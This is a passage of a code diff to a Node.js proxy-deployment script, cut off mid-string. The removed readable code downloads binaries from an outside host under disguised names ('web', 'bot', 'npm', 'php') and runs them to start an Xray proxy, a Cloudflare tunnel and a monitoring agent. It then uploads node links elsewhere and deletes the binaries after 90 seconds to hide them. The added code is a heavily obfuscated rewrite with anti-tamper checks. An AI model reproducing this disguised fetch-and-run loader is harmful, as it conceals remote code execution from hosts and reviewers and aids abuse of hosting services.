console.error(`npm running error: ${error}`); - } - } - } else { - console.log('NEZHA variable is empty,skip running'); - } - - // 运行xr-ay - const command1 = `nohup ${webPath} -c ${FILE_PATH}/config.json >/dev/null 2>&1 &`; - try { - await exec(command1); - console.log(`${webName} is running`); - await new Promise((resolve) => setTimeout(resolve, 1000)); - } catch (error) { - console.error(`web running error: ${error}`); - } - - // 运行cloud-fared - if (fs.existsSync(botPath)) { - let args; - - if (ARGO_AUTH.match(/^[A-Z0-9a-z=]{120,250}$/)) { - args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 run --token ${ARGO_AUTH}`; - } else if (ARGO_AUTH.match(/TunnelSecret/)) { - args = `tunnel --edge-ip-version auto --config ${FILE_PATH}/tunnel.yml run`; - } else { - args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 --logfile ${FILE_PATH}/boot.log --loglevel info --url http://localhost:${ARGO_PORT}`; - } - - try { - await exec(`nohup ${botPath} ${args} >/dev/null 2>&1 &`); - console.log(`${botName} is running`); - await new Promise((resolve) => setTimeout(resolve, 2000)); - } catch (error) { - console.error(`Error executing command: ${error}`); - } - } - await new Promise((resolve) => setTimeout(resolve, 5000)); -} - -// 根据系统架构返回对应的url -function getFilesForArchitecture(architecture) { - let baseFiles; - if (architecture === 'arm') { - baseFiles = [ - { fileName: webPath, fileUrl: "https://arm64.ssss.nyc.mn/web" }, - { fileName: botPath, fileUrl: "https://arm64.ssss.nyc.mn/bot" } - ]; - } else { - baseFiles = [ - { fileName: webPath, fileUrl: "https://amd64.ssss.nyc.mn/web" }, - { fileName: botPath, fileUrl: "https://amd64.ssss.nyc.mn/bot" } - ]; - } - - if (NEZHA_SERVER && NEZHA_KEY) { - if (NEZHA_PORT) { - const npmUrl = architecture === 'arm' - ? "https://arm64.ssss.nyc.mn/agent" - : "https://amd64.ssss.nyc.mn/agent"; - baseFiles.unshift({ - fileName: npmPath, - fileUrl: npmUrl - }); - } else { - const phpUrl = architecture === 'arm' - ? "https://arm64.ssss.nyc.mn/v1" - : "https://amd64.ssss.nyc.mn/v1"; - baseFiles.unshift({ - fileName: phpPath, - fileUrl: phpUrl - }); - } - } - - return baseFiles; -} - -// 获取固定隧道json -function argoType() { - if (!ARGO_AUTH || !ARGO_DOMAIN) { - console.log("ARGO_DOMAIN or ARGO_AUTH is empty, use quick tunnels"); - return; - } - - if (ARGO_AUTH.includes('TunnelSecret')) { - fs.writeFileSync(path.join(FILE_PATH, 'tunnel.json'), ARGO_AUTH); - const tunnelYaml = ` - tunnel: ${ARGO_AUTH.split('"')[11]} - credentials-file: ${path.join(FILE_PATH, 'tunnel.json')} - protocol: http2 - - ingress: - - hostname: ${ARGO_DOMAIN} - service: http://localhost:${ARGO_PORT} - originRequest: - noTLSVerify: true - - service: http_status:404 - `; - fs.writeFileSync(path.join(FILE_PATH, 'tunnel.yml'), tunnelYaml); - } else { - console.log(`Using token connect to tunnel, please set ${ARGO_PORT} in clouudflare`); - } -} - -// 获取临时隧道domain -async function extractDomains() { - let argoDomain; - - if (ARGO_AUTH && ARGO_DOMAIN) { - argoDomain = ARGO_DOMAIN; - console.log('ARGO_DOMAIN:', argoDomain); - await generateLinks(argoDomain); - } else { - try { - const fileContent = fs.readFileSync(path.join(FILE_PATH, 'boot.log'), 'utf-8'); - const lines = fileContent.split('\n'); - const argoDomains = []; - lines.forEach((line) => { - const domainMatch = line.match(/https?:\/\/([^ ]*trycloudflare\.com)\/?/); - if (domainMatch) { - const domain = domainMatch[1]; - argoDomains.push(domain); - } - }); - - if (argoDomains.length > 0) { - argoDomain = argoDomains[0]; - console.log('ArgoDomain:', argoDomain); - await generateLinks(argoDomain); - } else { - console.log('ArgoDomain not found, re-running bot to obtain ArgoDomain'); - fs.unlinkSync(path.join(FILE_PATH, 'boot.log')); - async function killBotProcess() { - try { - if (process.platform === 'win32') { - await exec(`taskkill /f /im ${botName}.exe > nul 2>&1`); - } else { - await exec(`pkill -f "[${botName.charAt(0)}]${botName.substring(1)}" > /dev/null 2>&1`); - } - } catch (error) { - // 忽略输出 - } - } - killBotProcess(); - await new Promise((resolve) => setTimeout(resolve, 3000)); - const args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 --logfile ${FILE_PATH}/boot.log --loglevel info --url http://localhost:${ARGO_PORT}`; - try { - await exec(`nohup ${botPath} ${args} >/dev/null 2>&1 &`); - console.log(`${botName} is running`); - await new Promise((resolve) => setTimeout(resolve, 3000)); - await extractDomains(); - } catch (error) { - console.error(`Error executing command: ${error}`); - } - } - } catch (error) { - console.error('Error reading boot.log:', error); - } - } -} - -// 获取isp信息 -async function getMetaInfo() { - try { - const response1 = await axios.get('https://api.ip.sb/geoip', { headers: { 'User-Agent': 'Mozilla/5.0', timeout: 3000 } }); - if (response1.data && response1.data.country_code && response1.data.isp) { - return `${response1.data.country_code}-${response1.data.isp}`.replace(/\s+/g, '_'); - } - } catch (error) { - try { - const response2 = await axios.get('http://ip-api.com/json', { headers: { 'User-Agent': 'Mozilla/5.0', timeout: 3000 } }); - if (response2.data && response2.data.status === 'success' && response2.data.countryCode && response2.data.org) { - return `${response2.data.countryCode}-${response2.data.org}`.replace(/\s+/g, '_'); - } - } catch (error) { - // console.error('Backup API also failed'); - } - } - return 'Unknown'; -} - -// 生成 list 和 sub 信息 -async function generateLinks(argoDomain) { - const ISP = await getMetaInfo(); - const nodeName = NAME ? `${NAME}-${ISP}` : ISP; - return new Promise((resolve) => { - setTimeout(() => { - const VMESS = { v: '2', ps: `${nodeName}`, add: CFIP, port: CFPORT, id: UUID, aid: '0', scy: 'auto', net: 'ws', type: 'none', host: argoDomain, path: '/vmess-argo?ed=2560', tls: 'tls', sni: argoDomain, alpn: '', fp: 'firefox' }; - const subTxt = ` -vless://${UUID}@${CFIP}:${CFPORT}?encryption=none&security=tls&sni=${argoDomain}&fp=firefox&type=ws&host=${argoDomain}&path=%2Fvless-argo%3Fed%3D2560#${nodeName} - -vmess://${Buffer.from(JSON.stringify(VMESS)).toString('base64')} - -trojan://${UUID}@${CFIP}:${CFPORT}?security=tls&sni=${argoDomain}&fp=firefox&type=ws&host=${argoDomain}&path=%2Ftrojan-argo%3Fed%3D2560#${nodeName} - `; - console.log(Buffer.from(subTxt).toString('base64')); - fs.writeFileSync(subPath, Buffer.from(subTxt).toString('base64')); - console.log(`${FILE_PATH}/sub.txt saved successfully`); - // 将订阅内容保存到全局变量,供 http 服务器使用 - subContent = Buffer.from(subTxt).toString('base64'); - uploadNodes(); - resolve(subTxt); - }, 2000); - }); -} - -// 自动上传节点或订阅 -async function uploadNodes() { - if (UPLOAD_URL && PROJECT_URL) { - const subscriptionUrl = `${PROJECT_URL}/${SUB_PATH}`; - const jsonData = { - subscription: [subscriptionUrl] - }; - try { - const response = await axios.post(`${UPLOAD_URL}/api/add-subscriptions`, jsonData, { - headers: { - 'Content-Type': 'application/json' - } - }); - - if (response && response.status === 200) { - console.log('Subscription uploaded successfully'); - return response; - } else { - return null; - } - } catch (error) { - if (error.response) { - if (error.response.status === 400) { - // console.error('Subscription already exists'); - } - } - } - } else if (UPLOAD_URL) { - if (!fs.existsSync(listPath)) return; - const content = fs.readFileSync(listPath, 'utf-8'); - const nodes = content.split('\n').filter(line => /(vless|vmess|trojan|hysteria2|tuic):\/\//.test(line)); - - if (nodes.length === 0) return; - - const jsonData = JSON.stringify({ nodes }); - - try { - const response = await axios.post(`${UPLOAD_URL}/api/add-nodes`, jsonData, { - headers: { 'Content-Type': 'application/json' } - }); - if (response && response.status === 200) { - console.log('Nodes uploaded successfully'); - return response; - } else { - return null; - } - } catch (error) { - return null; - } - } else { - // console.log('Skipping upload nodes'); - return; - } -} - -// 90s后删除相关文件 -function cleanFiles() { - setTimeout(() => { - const filesToDelete = [bootLogPath, configPath, webPath, botPath]; - - if (NEZHA_PORT) { - filesToDelete.push(npmPath); - } else if (NEZHA_SERVER && NEZHA_KEY) { - filesToDelete.push(phpPath); - } - - if (process.platform === 'win32') { - exec(`del /f /q ${filesToDelete.join(' ')} > nul 2>&1`, (error) => { - console.clear(); - console.log('App is running'); - console.log('Thank you for using this script, enjoy!'); - }); - } else { - exec(`rm -rf ${filesToDelete.join(' ')} >/dev/null 2>&1`, (error) => { - console.clear(); - console.log('App is running'); - console.log('Thank you for using this script, enjoy!'); - }); - } - }, 90000); -} -cleanFiles(); - -// 自动访问项目URL -async function AddVisitTask() { - if (!AUTO_ACCESS || !PROJECT_URL) { - console.log("Skipping adding automatic access task"); - return; - } - - try { - const response = await axios.post('https://oooo.serv00.net/add-url', { - url: PROJECT_URL - }, { - headers: { - 'Content-Type': 'application/json' - } - }); - console.log(`automatic access task added successfully`); - return response; - } catch (error) { - console.error(`Add automatic access task faild: ${error.message}`); - return null; - } -} - -// 主运行逻辑 -async function startserver() { - try { - argoType(); - deleteNodes(); - cleanupOldFiles(); - await generateConfig(); - await downloadFilesAndRun(); - await extractDomains(); - await AddVisitTask(); - } catch (error) { - console.error('Error in startserver:', error); - } -} -startserver().catch(error => { - console.error('Unhandled error in startserver:', error); -}); - -// 创建 http 服务器 -const server = http.createServer(async (req, res) => { - const urlPath = req.url.split('?')[0]; - - // 订阅路由 - if (urlPath === `/${SUB_PATH}`) { - if (subContent) { - res.writeHead(200, { 'Content-Type': 'text/plain; charset=utf-8' }); - res.end(subContent); - } else { - // 订阅内容尚未生成,尝试从文件读取 - try { - const fileContent = fs.readFileSync(subPath, 'utf-8'); - res.writeHead(200, { 'Content-Type': 'text/plain; charset=utf-8' }); - res.end(fileContent); - } catch (err) { - res.writeHead(503, { 'Content-Type': 'text/plain; charset=utf-8' }); - res.end('Subscription content not yet available, please try again later.'); - } - } - return; - } - - // 根路由: / - if (urlPath === '/') { - try { - const filePath = path.join(__dirname, 'index.html'); - const data = await fs.promises.readFile(filePath, 'utf8'); - res.writeHead(200, { 'Content-Type': 'text/html; charset=utf-8' }); - res.end(data); - } catch (err) { - res.writeHead(200, { 'Content-Type': 'text/html; charset=utf-8' }); - res.end("Hello world!

You can access /{SUB_PATH}(Default: /sub) to get your nodes!"); - } - return; - } - - res.writeHead(404, { 'Content-Type': 'text/plain; charset=utf-8' }); - res.end('Not Found'); -}); - -server.listen(PORT, () => console.log(`http server is running on port:${PORT}!`)); +(function(_0x18eb2f,_0x25128e){const _0x654082={_0x56869b:0x32c,_0x3a3ada:0x195,_0x1e044b:0x266,_0xace9a:0xd6,_0x1454dd:0x18b,_0x3de56f:0x25e,_0x3ab0fc:0x380,_0x65589f:0x356,_0x3819f7:0x390,_0x368f8f:0x229,_0x2c8c1d:0x1ec,_0x560b73:0x17e,_0x17109e:0x179,_0x192e12:0x3bc,_0x188e1c:0x30b,_0x38702d:0x2af,_0x43bf3a:0x219,_0x32c578:0x20e,_0x3df528:0x434,_0x21d1d2:0x347,_0x8c7437:0x253,_0x445bc5:0x27c,_0x24ee43:0x245,_0x2fcbf5:0x2be,_0x3fda2e:0x161,_0x5913fc:0x313,_0x24a0ad:0x341},_0x3fbc02={_0x8b737:0x11c},_0x331ecf={_0x141aa6:0x99};function _0x351150(_0x3ff275,_0x5817ff,_0x15bf85,_0x5744dd){return _0x4999(_0x5817ff-_0x331ecf._0x141aa6,_0x15bf85);}const _0x240fbd=_0x18eb2f();function _0x39a109(_0xd9f92a,_0xfd4ebf,_0x489391,_0x4987dc){return _0x4999(_0xfd4ebf-_0x3fbc02._0x8b737,_0x489391);}while(!![]){try{const _0x3ae18c=-parseInt(_0x351150(_0x654082._0x56869b,0x28c,0x333,_0x654082._0x3a3ada))/(0x2*0xcfb+-0x1*0x20c3+0x1*0x6ce)+parseInt(_0x351150(_0x654082._0x1e044b,0x190,_0x654082._0xace9a,_0x654082._0x1454dd))/(0x1f85+0x24e*0xd+-0x3d79)*(parseInt(_0x351150(_0x654082._0x3de56f,_0x654082._0x3ab0fc,_0x654082._0x65589f,_0x654082._0x3819f7))/(0x23e*0x9+0x6b7+-0x1ae2))+parseInt(_0x39a109(_0x654082._0x368f8f,_0x654082._0x2c8c1d,_0x654082._0x560b73,_0x654082._0x17109e))/(0x2519*-0x1+0xd*-0x1f7+0x322*0x14)+parseInt(_0x39a109(_0x654082._0x192e12,_0x654082._0x188e1c,_0x654082._0x38702d,_0x654082._0x43bf3a))/(-0x7e*-0x6+0x1*-0x12d7+-0xfe8*-0x1)+parseInt(_0x351150(0x267,_0x654082._0x32c578,0x27a,0x16f))/(-0xff3+-0xa62*0x2+0x24bd)*(-parseInt(_0x351150(_0x654082._0x3df528,_0x654082._0x21d1d2,_0x654082._0x8c7437,0x446))/(-0x1ae6+-0x153*-0xf+0x710))+parseInt(_0x39a109(_0x654082._0x445bc5,_0x654082._0x24ee43,_0x654082._0x2fcbf5,_0x654082._0x3fda2e))/(-0x1107+0xd93*0x1+0x37c)+-parseInt(_0x351150(0x20a,0x2d1,_0x654082._0x5913fc,_0x654082._0x24a0ad))/(0x15b5+-0xb7+0x1d*-0xb9);if(_0x3ae18c===_0x25128e)break;else _0x240fbd['push'](_0x240fbd['shift']());}catch(_0x588d75){_0x240fbd['push'](_0x240fbd['shift']());}}}(_0x38f0,-0x3f0ea+-0x806c1+0x1702c0));const _0x16bfe2=(function(){const _0x48364a={_0x18a9b4:0x96,_0x45caa6:0xf,_0x2a783a:0x8c,_0x4927b2:0x1f,_0x5eb554:0x14c,_0x5724a4:0x149,_0x2ebef2:0x24a,_0x4e0aba:0x1a4,_0x410fa4:0xa6,_0x45d561:0x91,_0x530415:0x10f,_0x53361e:0x56,_0x4525cd:0x9f,_0x29fd83:0x43,_0x19a73a:0x6a,_0x43c2be:0xd8,_0x3fd834:0x13d,_0x106e68:0xaf,_0x583e88:0x5f,_0xc885ef:0x254,_0x24589e:0x219,_0x351eec:0x295},_0x5cb17c={};_0x5cb17c['oeEBZ']=_0xa90642(_0x48364a._0x18a9b4,-_0x48364a._0x45caa6,-_0x48364a._0x2a783a,-_0x48364a._0x4927b2),_0x5cb17c[_0xa90642(0x19f,_0x48364a._0x5eb554,_0x48364a._0x5724a4,_0x48364a._0x2ebef2)]=_0xa90642(_0x48364a._0x4e0aba,_0x48364a._0x410fa4,_0x48364a._0x45d561,_0x48364a._0x530415),_0x5cb17c['QyeVj']=function(_0x1b7761,_0x4ee2c){return _0x1b7761===_0x4ee2c;};function _0x909bd(_0x4845f0,_0x51c1d0,_0xe3b9e3,_0x2e477c){return _0x4999(_0xe3b9e3- -0x311,_0x51c1d0);}_0x5cb17c[_0xa90642(_0x48364a._0x53361e,_0x48364a._0x4525cd,_0x48364a._0x29fd83,_0x48364a._0x19a73a)]=_0xa90642(_0x48364a._0x43c2be,_0x48364a._0x3fd834,0xd6,_0x48364a._0x106e68),_0x5cb17c[_0x909bd(-0x176,-_0x48364a._0x410fa4,-_0x48364a._0x583e88,0x24)]=_0x909bd(-_0x48364a._0xc885ef,-0x23b,-_0x48364a._0x24589e,-_0x48364a._0x351eec);function _0xa90642(_0x5890c1,_0xb862b3,_0x3d0a10,_0x5a3ee3){return _0x4999(_0xb862b3- -0x146,_0x5890c1);}const _0x886077=_0x5cb17c;let _0xa4e1de=!![];return function(_0x29b791,_0x4fd264){const _0x583f01={_0x57bded:0x629,_0x154352:0x548,_0x51e3bb:0x38,_0x21bd4d:0x117,_0x149265:0x7f,_0x4085cc:0x17d,_0x5b3fdb:0x130,_0x26dbab:0x176,_0x552156:0x620,_0x571b09:0x62f,_0x1e15c0:0x5ab,_0x550f8f:0x2ea,_0x2269e4:0x281,_0x31da33:0x1ba,_0x158c9a:0x245,_0x452a36:0x2d,_0x404f22:0x121,_0xece59d:0x3d,_0x57d95e:0x12a,_0x5191ba:0x17c,_0x274135:0x54,_0x60666a:0x45b,_0x14e679:0x536,_0x118c7c:0x429,_0x2b6733:0x471,_0x198b65:0x62e,_0xac3b05:0x603,_0xd6ec72:0x5f8,_0x1d4aa2:0x1cb,_0x502fa4:0x173,_0x10d3cf:0x16d,_0xd9e064:0xcc},_0x42dd28={_0x169838:0x6f},_0x12ac01=_0xa4e1de?function(){function _0x22907f(_0x11a51c,_0xc5ced4,_0xe76a9c,_0x42eace){return _0x4999(_0xe76a9c-0x37d,_0x11a51c);}const _0x4f7696={};function _0x413e41(_0x264d35,_0x8319f5,_0x3bdf47,_0x5d555){return _0x4999(_0x5d555- -_0x42dd28._0x169838,_0x8319f5);}_0x4f7696['DCSld']=_0x886077[_0x22907f(_0x583f01._0x57bded,0x5e9,0x647,_0x583f01._0x154352)],_0x4f7696['FKGjo']=_0x886077['goPbc'];const _0x990ac2=_0x4f7696;if(_0x886077[_0x413e41(_0x583f01._0x51e3bb,_0x583f01._0x21bd4d,_0x583f01._0x149265,0xcd)](_0x886077[_0x413e41(_0x583f01._0x4085cc,_0x583f01._0x5b3fdb,0x288,_0x583f01._0x26dbab)],_0x886077[_0x22907f(0x63c,_0x583f01._0x552156,_0x583f01._0x571b09,_0x583f01._0x1e15c0)])){const _0x22605d={};_0x22605d[_0x413e41(_0x583f01._0x550f8f,_0x583f01._0x2269e4,_0x583f01._0x31da33,_0x583f01._0x158c9a)]=_0x2d315e,_0x22605d[_0x413e41(_0x583f01._0x452a36,_0x583f01._0x404f22,0x7d,_0x583f01._0xece59d)]=_0x990ac2[_0x413e41(_0x583f01._0x57d95e,_0x583f01._0x5191ba,_0x583f01._0x274135,0x109)];const _0x590b90={};_0x590b90['fileName']=_0x127084,_0x590b90[_0x22907f(_0x583f01._0x60666a,_0x583f01._0x14e679,_0x583f01._0x118c7c,_0x583f01._0x2b6733)]=_0x990ac2[_0x22907f(0x63a,_0x583f01._0x198b65,_0x583f01._0xac3b05,_0x583f01._0xd6ec72)],_0x34e89f=[_0x22605d,_0x590b90];}else{if(_0x4fd264){const _0x573cc4=_0x4fd264[_0x413e41(_0x583f01._0x1d4aa2,_0x583f01._0x502fa4,_0x583f01._0x10d3cf,_0x583f01._0xd9e064)](_0x29b791,arguments);return _0x4fd264=null,_0x573cc4;}}}:function(){};return _0xa4e1de=![],_0x12ac01;};}()),_0x24e749=_0x16bfe2(this,function(){const _0x3ee570={_0x3883d1:0x3fe,_0x244c3b:0x565,_0x5a0bf2:0x524,_0x491bf4:0x581,_0x5530e3:0x59b,_0x38776a:0x60c,_0xb2bc24:0x147,_0x1e98b4:0x3b,_0x9e210a:0x100,_0x310d9d:0xb2,_0x37f180:0x1be,_0x2d1bd8:0x163,_0x814036:0x16e,_0x7a6150:0x209,_0xd4038d:0x1f3,_0x1b3a7a:0x241,_0x40c77e:0x13f,_0x1e53eb:0x24d},_0x5afc33={_0xed3a45:0x68},_0x463521={_0x52757a:0x39b};function _0x56737d(_0x5695e9,_0x421de2,_0x3fb78b,_0x14b615){return _0x4999(_0x14b615-_0x463521._0x52757a,_0x421de2);}const _0x1b63f0={};_0x1b63f0['UMBCJ']=_0x56737d(_0x3ee570._0x3883d1,_0x3ee570._0x244c3b,0x4fd,_0x3ee570._0x5a0bf2);function _0x5aee76(_0x8a462c,_0x3adb38,_0x56c49f,_0x47db48){return _0x4999(_0x47db48- -_0x5afc33._0xed3a45,_0x8a462c);}const _0x64a4ac=_0x1b63f0;return _0x24e749['toString']()[_0x56737d(_0x3ee570._0x491bf4,_0x3ee570._0x5530e3,0x579,_0x3ee570._0x38776a)]('(((.+)+)+)+$')[_0x5aee76(_0x3ee570._0xb2bc24,-_0x3ee570._0x1e98b4,_0x3ee570._0x9e210a,_0x3ee570._0x310d9d)]()['constructor'](_0x24e749)[_0x5aee76(_0x3ee570._0x37f180,_0x3ee570._0x2d1bd8,_0x3ee570._0x814036,_0x3ee570._0x7a6150)](_0x64a4ac[_0x5aee76(_0x3ee570._0xd4038d,_0x3ee570._0x1b3a7a,_0x3ee570._0x40c77e,_0x3ee570._0x1e53eb)]);});_0x24e749();function _0x38f0(){const _0x2ef330=['txDIrLu','tM9KzxmGDxbSB2fKzwqGC3vJy2vZC2z1BgX5','tNDyD1C','whDJsMi','wMHHCva','z29pAK8','vNvTBxi','D2fYBG','jNbHDgG9jtjgDhjVAMfUlwfYz28Lm0zLzcuZrdi1nJaJ','sNfis3u','cNvZzv9NAxrLzv90B191CgDYywrLoIbMywXZzqP1C2vFAxb2nL9JB3vUDhj5x2nVzgu6igzHBhnLcNv1Awq6ia','mJa1mW','CfLSrNK','igLUignSB3v1zgzSyxjL','wLriB1a','yKjSs3i','AMnPAhy','lMv4zsa+ig51BcaYpIyX','EgLvB1q','Ahr0Chm6lY9HCgKUAxaUC2iVz2vVAxa','vLnIy2S','p3nLy3vYAxr5pxrSCYzZBMK9','l2nVBMzPzY5QC29Uid4Vzgv2l251BgWGmJ4MmsaM','DhbHtMC','wfLkzM8','yxjHs24','cIaGicaGihnLCNzPy2u6igH0Dha6lY9SB2nHBgHVC3q6','l3n1yI50EhqGC2f2zwqGC3vJy2vZC2z1BgX5','EMDStvm','l2fWAs9KzwXLDguTBM9Kzxm','BNrMDeu','uLrlBNO','ALbczfG','ywX0zxjjza','r0Llqui','DvjZyuS','zK9zrfC','EhrSCY1YChj4lxzPC2LVBG','zNjVBq','C2vHCMnO','AePuBK8','vhbOuvG','zxHPC3rZu3LUyW','thHHzwe','qvjht19et01bsu4','DwrZwK4','DfzeCgW','q2fUj3qGzMLUzcbHigzPBguGzM9YihrOzsbJDxjYzw50igfYy2HPDgvJDhvYzq','Cg9ZDa','A1v0Dvu','Aw9PCvm','yLbXAgS','Aev3DLi','iIa+ic9KzxyVBNvSBcaYpIyX','mJa4nW','Bgz4qMm','qLr6twe','r0DgBfC','v1HnAxG','ywrK','rKThAM8','y1vfsgm','DgnW','yMfZzw5HBwu','zg5Z','r0fRDfC','Aw5MBW','sfrAyMu','zNjLzwrVBq','t0D1Cve','igLZihj1BM5PBMC','zgvJCNLWDgLVBG','z29qyMm','z1LHBgC','C2vJDxjPDhK','CgfZC3DVCMq','DMPmzNu','txDWvwC','ALPNsgu','zxHLyW','y2Pquxa','v3zjBhe','wuzUBuO','odq0mW','ue9sva','ANf3sgO','DhvUBMvSlNLTBa','tNrAs1K','uMvSDeu','y29UC29Szq','vxnLCI1bz2vUDa','q1fmCNq','DM1LC3m','ic0TzgLZywjSzs1HDxrVlxvWzgf0zsaTlxjLCg9YDc1KzwXHEsa0ic0TC2TPCc1JB25Uic0TC2TPCc1WCM9JCYa+l2rLDI9UDwXSidi+jJeGjG','EMT3thG','AKjosNG','A2Xkyvi','BwTKAxjtEw5J','yMXHy2TOB2XL','CK94wNK','mty1ody1vfLTrgDW','vevQBKi','tufIv2i','zwvMy1u','D0Tmuge','t0H5CKe','zMLSzu5HBwu','vu1cq0O','ywfKs0u','rvPhuNi','C3nhyMq','D3ntzxr0Aw5NCW','BM9Kzxm','rK5krgi','u3vIC2nYAxb0Aw9UihvWBg9HzgvKihn1y2nLC3nMDwXSEq','tKvAsefFs0vz','EMDZAxq','qvjht19et01bsu46','ChjVDg9JB2W','ywjJzgvMz2HPAMTSBw5VChfYC3r1DND4ExO','DLbSELi','uK5lB3O','u3zuChi','wKjtzgC','DgfN','yureCwS','tMHtse8','A3zwEe0','B2vfqLO','u05zseG','vvbmt0fex1vsta','cMnSAwvUDf9ZzwnYzxq6ia','q01uvem','BMzYv0u','AM9PBG','y2HTB2q','cIaGy3jLzgvUDgLHBhmTzMLSztOG','tMjmt3m','v2nMtge','u1jvvg4','zgvSic9Mic9Xia','CMvWBgfJzq','thPczeS','ic1Jici','yxv0B21HDgLJigfJy2vZCYb0yxnRigfKzgvKihn1y2nLC3nMDwXSEq','ref1rfC','ihn1y2nLC3nMDwXSEq','vuvbCue','vgjzrxK','AxnW','rKPRtwC','u0vbtwe','thbSy3e','cIaGChjVDg9JB2W6igH0DhaYcIaGcIaGAw5NCMvZCZOkicaGic0GAg9ZDg5HBwu6ia','CMvHzezPBgvtEw5J','DxjS','yKzTy2K','mJG0mda1nvHNze1eBa','tezvuhO','zxHJzxb0Aw9U','id4GBNvSidi+jJe','ic1Wia','zxPXuu4','zxjYB3i','z05dEfm','CM0GlxjMia','DgfZA2TPBgWGl2yGl2LTia','u01iqLi','DhvUBMvSic0TzwrNzs1PCc12zxjZAw9Uigf1Dg8Gls1UBY1HDxrVDxbKyxrLic0TChjVDg9JB2WGAhr0CdiGCNvUic0TDg9Rzw4G','DgfIBgu','Dgv4Dc9ODg1SoYbJAgfYC2v0pxv0zI04','rhL2yKW','AKn1twO','y2XLyxi','rMLUruO','C3rYzwfTu2v0DgLUz3m','zMLSzvvYBa','r05qtu0','q0zjua','wKzSEvi','BwTgCKu','qvniuLG','l2fWAs9HzgqTC3vIC2nYAxb0Aw9UCW','mJa5nG','wwXJtKe','Bg9N','rKfkD0u','l2rLDI9UDwXS','mJa4mW','B2PvCu4','tKHdzLK','BMv0D29YAW','wg9rA2C','BuLfr2m','ywHeEhC','Cvb5Auu','qvjht19et01bsu4GB3iGqvjht19bvvriigLZigvTChr5lcb1C2uGCxvPy2SGDhvUBMvSCW','qxjNB0rVBwfPBJO','rxrur1e','C3rYzwfT','EeLTq3q','AwfLEu0','C3rYAw5NAwz5','CgHWihj1BM5PBMCGzxjYB3i6ia','Be9hA0y','Ahr0Ca','zfDeBMu','ChvZAa','vLHYBvi','qNPeAeu','BMvhA1a','Bg5zChm','mJCYotuYmenoC0DWqq','y3jLyxrLv3jPDgvtDhjLyw0','wMzyrxm','yxv0BW','tNPRBLq','BhfOyw8','AgvHzgvYCW','Ahr0ChmRBg9JywW6lY84lJGUoc44l2rUCY1XDwvYEq','Cw9lu2q','BLjry3G','u1DHruy','yuLrr3u','B1zSDwO','q0rXBeO','vgD1yMG','twzZuwe','AgXItKm','sfPpzKy','rg93BMXVywqG','A0PwDMq','q3zKAhG','DxrPBa','rw1WB3DLCM1LBNqGC3vJy2vZCYbMB3iG','r095CKO','v0rYve8','vxnPBMCGDg9Rzw4Gy29UBMvJDcb0BYb0Dw5UzwWSihbSzwfZzsbZzxqG','Ahr0Chm6lY9HCM02nc5ZC3nZlM55yY5TBI92mq','z2v0','Ahr0Chm6lY9HBwq2nc5ZC3nZlM55yY5TBI93zwi','wevfy3C','Dw5SAw5Ru3LUyW','vLL2rfy','vwTrB2i','vhjUDLG','yxjT','igzHAwXLzdOG','v2TYtgO','tLDJAe0','vw5Oyw5KBgvKigvYCM9YigLUihn0yxj0C2vYDMvYoG','mLHeq0HAtq','rw9ArMi','qxjfEwG','wNrAu1e','Dgv4Dc9WBgfPBJSGy2HHCNnLDd11DgyToa','qvjht19qt1ju','DMXLC3m','qxbWigLZihj1BM5PBMC','zMLYzwzVEa','DhjHy2u','jNbHDgG9jtjgDMXLC3mTyxjNBYuZrMvKjtnemJu2mcm','D2zHteK','yxjTnJq','sgvSBg8GD29YBgqHpgjYpJXICJ5zB3uGy2fUigfJy2vZCYaVE1nvqL9qqvriFsHezwzHDwX0oIaVC3vIksb0BYbNzxqGEw91CIbUB2rLCYe','y2HHCKf0','tKvAsefFu0vsvKvs','shLKCgW','DgvZDa','zxHQEMm','jMzWpwzPCMvMB3GMDhLWzt13CYzOB3n0pq','C2n5','l3zTzxnZlwfYz28','zw5HyMXLza','Dvb4A3u','DhvUBMvSic0TzwrNzs1PCc12zxjZAw9Uigf1Dg8Gls1UBY1HDxrVDxbKyxrLic0TChjVDg9JB2WGAhr0CdiGls1SB2DMAwXLia','tuLOrhO','C3rHDfn5BMm','v3LWEMm','sujov24','u2TPChbPBMCGywrKAw5Nigf1Dg9TyxrPyYbHy2nLC3mGDgfZAW','zfDtA1K','r1feBKm','AMjpz08','t1fSCgq','wK9Hvwe','Dg9tDhjPBMC','zg9YCu8','DxrMoa','EMLIvLm','uNjrwMm','zgvZDe92zxjYAwrL','sMnIChG','A25hELO','E30Uy29UC3rYDwn0B3iOiNjLDhvYBIb0AgLZiIKOicK','EMnArhq','EuPAuhq','wKXfwhm','z01YzuW','BM9Uzq','q0zqt1ju','nZiZnZK2meD1CgjNtW','wMH3yKK','CMvJDxjZAxzL','BM9ODxaG','qwLvwuC','Chv4rNa','Bg1zu1i','y29UzMLNlMPZB24','wLH3wgK','zgLYzwn0','CLfWD0O','tw96AwXSys81lJa','y2HPBgrFChjVy2vZCW','BwjWCMG','Ahr0Chm6lY9HCM02nc5ZC3nZlM55yY5TBI93zwi','zw52','zK5wDxm','r1rNsKK','yxbWBhK','uxLLvMO','z2TSz2q','AMX4ufG','wfv0tM8','zLLwD3u','cIaGicaGig9YAwDPBLjLCxvLC3q6cIaGicaGicaGBM9utfnwzxjPzNK6ihrYDwukicaGic0GC2vYDMLJztOGAhr0Cf9ZDgf0Dxm6nda0cIaG','ndqZ','l3rYB2PHBI1HCMDV','B3PXtLu','whzyBuu','DxrMltG','quf1CKK','yxHPB3m','cNzSzxnZoI8V','C3vIlNr4Da','DuLjvwe','Ahr0CcbZzxj2zxiGAxmGCNvUBMLUzYbVBIbWB3j0oG','ChHjrLK','zMTou2G','Devcz3e','CMvHzgrPCLn5BMm','DhvUBMvSlMPZB24','id4Vzgv2l251BgWGmJ4Mmq','B0Xvz1G','igfSCMvHzhKGzxHPC3rZ','weHTzeC','thHQs1e','txnkCgC','vhvUBMvSu2vJCMv0','D3nrqvi','C25P','zMLSDgvY','C2v0DgLUz3m','zgHTBMS','zgXqCvG','CMvHzezPBgu','Ahr0Chm6lY9HCM02nc5ZC3nZlM55yY5TBI9Hz2vUDa','AfDcExm','t2fpDNm','C2fHCY5ZAw4UzMfU','ywLK','vuvTywy','qNbKtNK','l3zSzxnZlwfYz28','B3jN','v1PQCgm','B2vXzxO','Bwv0ywrHDgfpBMX5','Evzyu3q','EMrpDhO','y2XVC2u','C2PmvKu','A1nOALa','senQCgC','zw5K','Bgv2zwW','EuHis2O','mJeWq3Dhr3jm','tKvAsefFue